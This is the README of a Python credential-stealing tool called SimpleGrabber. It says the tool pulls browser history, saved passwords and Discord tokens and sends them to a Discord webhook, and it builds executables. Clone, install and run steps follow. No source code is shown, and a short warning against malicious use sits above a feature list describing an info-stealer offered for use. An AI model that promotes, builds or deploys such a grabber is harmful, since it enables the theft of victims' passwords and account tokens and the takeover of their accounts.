SimpleGrabber is a boilerplate tool built in python to extract browser data to a discord webhook.
Warning
Please do NOT use this malisciously not only is it illegal but it is not safe for you or anyone.
- Extracts History
- Extracts Saved Passwords (iffy for non-chromium browsers. edge specifically)
- Extracts Discord token (browser instance only)
- Built in EXE/script builder
- Clone the repository
git clone https://github.com/Ragoon821/SimpleGrabber.git
- Now change into the project folder:
cd SimpleGrabber- You can now install the required packages:
pip install -r requirements.txt- And finnally, run the program
python builder.py

